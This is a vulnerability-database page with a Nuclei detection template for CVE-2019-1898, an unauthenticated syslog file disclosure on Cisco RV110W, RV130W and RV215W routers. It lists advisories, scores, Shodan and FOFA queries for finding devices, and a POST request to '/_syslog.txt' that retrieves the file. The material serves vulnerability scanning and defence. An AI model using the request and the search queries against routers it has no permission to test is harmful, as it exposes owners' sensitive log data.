Cisco RV110W RV130W RV215W Router - Information leakage

🗓️ 28 Jun 2026 15:08:32Reported by ProjectDiscoveryType

Cisco RV110W RV130W RV215W Router - Information leakage vulnerability allowing unauthenticated remote access to syslog file containing sensitive information

Reporter	Title	Published	Views	Family All 10
BDU FSTEC	The vulnerability in the web-based management interfaces of Cisco RV110W Wireless-N VPN Firewalls, Cisco RV130W Wireless-N Multifunction VPN Routers, and Cisco RV215W Wireless-N VPN Routers allows attackers to gain access to protected information.	23 Jul 201900:00	–	bdu_fstec
Cisco	Cisco RV110W, RV130W, and RV215W Routers Unauthenticated syslog File Access Vulnerability	19 Jun 201916:00	–	cisco
Tenable Nessus	Cisco RV110W, RV130W, and RV215W Routers Syslog HTTP Access Information Disclosure Vulnerability (cisco-sa-20190619-rv-fileaccess)	19 Jun 201900:00	–	nessus
Tenable Nessus	Cisco RV110W, RV130W, and RV215W Routers Syslog Disclosure (cisco-sa-20190619-rv-fileaccess)	19 Jun 201900:00	–	nessus
CNVD	Cisco RV110W, RV130W, and RV215W Authorization Issues Vulnerabilities	21 Jun 201900:00	–	cnvd
CVE	CVE-2019-1898	20 Jun 201903:05	–	cve
Cvelist	CVE-2019-1898 Cisco RV110W, RV130W, and RV215W Routers Unauthenticated syslog File Access Vulnerability	20 Jun 201903:05	–	cvelist
NVD	CVE-2019-1898	20 Jun 201903:15	–	nvd
Prion	Authorization	20 Jun 201903:15	–	prion
Vulnrichment	CVE-2019-1898 Cisco RV110W, RV130W, and RV215W Routers Unauthenticated syslog File Access Vulnerability	20 Jun 201903:05	–	vulnrichment

Source	Link
nvd	www.nvd.nist.gov/vuln/detail/CVE-2019-1898
tools	www.tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190619-rv-fileaccess
tenable	www.tenable.com/security/research/tra-2019-29

id: CVE-2019-1898

info:
  name: Cisco RV110W RV130W RV215W Router - Information leakage
  author: SleepingBag945
  severity: medium
  description: |
    A vulnerability in the web-based management interface of Cisco RV110W, RV130W, and RV215W Routers could allow an unauthenticated, remote attacker to access the syslog file on an affected device. The vulnerability is due to improper authorization of an HTTP request. An attacker could exploit this vulnerability by accessing the URL for the syslog file. A successful exploit could allow the attacker to access the information contained in the file.
  impact: |
    An attacker can exploit this vulnerability to gain sensitive information from the router.
  remediation: |
    Apply the latest firmware update provided by Cisco to fix the vulnerability.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2019-1898
    - https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190619-rv-fileaccess
    - https://www.tenable.com/security/research/tra-2019-29
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2019-1898
    cwe-id: CWE-425,CWE-285
    epss-score: 0.40951
    epss-percentile: 0.98481
    cpe: cpe:2.3:o:cisco:rv110w_firmware:-:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: cisco
    product: rv110w_firmware
    shodan-query: http.favicon.hash:"-646322113"
    fofa-query: icon_hash="-646322113"
  tags: cve,cve2019,cisco,router,iot,vuln

http:
  - method: POST
    path:
      - '{{BaseURL}}/_syslog.txt'

    headers:
      Content-Type: application/x-www-form-urlencoded
    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(to_lower(body), "ethernet") && contains(to_lower(body), "connection")'
          - 'contains(header, "application/octet-stream")'
        condition: and
# digest: 4b0a004830460221009092e5d30b3d8e50ef33ea6e2660606369c908f02bbfceb13cde1cfd3b9910c2022100989ef1210ef56572a29ae30abb1bbe1efe984d5ac9372270b9f9d16101ca2e57:922c64590222798bb761d5b6d8e72950

04 Feb 2026 07:00Current

6.1Medium risk

Vulners AI Score6.1

CVSS 25

CVSS 3.15.3

CVSS 35.3

EPSS0.40951

SSVC